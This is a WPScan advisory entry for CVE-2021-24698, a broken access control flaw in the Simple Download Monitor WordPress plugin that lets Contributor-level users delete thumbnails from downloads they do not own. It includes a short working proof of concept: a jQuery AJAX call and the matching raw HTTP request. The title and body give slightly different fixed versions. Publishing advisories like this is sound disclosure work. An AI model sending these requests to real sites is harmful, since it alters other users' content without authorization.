WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Simple Download Monitor < 3.9.6 - Arbitrary Thumbnails Removal

Description

The plugin allows users with a role as low as Contributor to remove thumbnails from downloads they do not own, even if they cannot normally edit the download.

Proof of Concept

jQuery.post(ajaxurl, {
action: "sdm_remove_thumbnail_image",
post_id_del: 613 // not owned by the user
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Connection: close
Cookie: [contrib+ not owning the download to remove the thumbnail from]

action=sdm_remove_thumbnail_image&post_id_del=613

Affects Plugins

simple-download-monitor
Fixed in version 3.9.5

References

CVE
CVE-2021-24698

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID
1fda1356-77d8-4e77-9ee6-8f9ceeb3d380

Timeline

Publicly Published

2021-10-05 (about 10 months ago)

Added

2021-10-05 (about 10 months ago)

Last Updated

2022-04-09 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin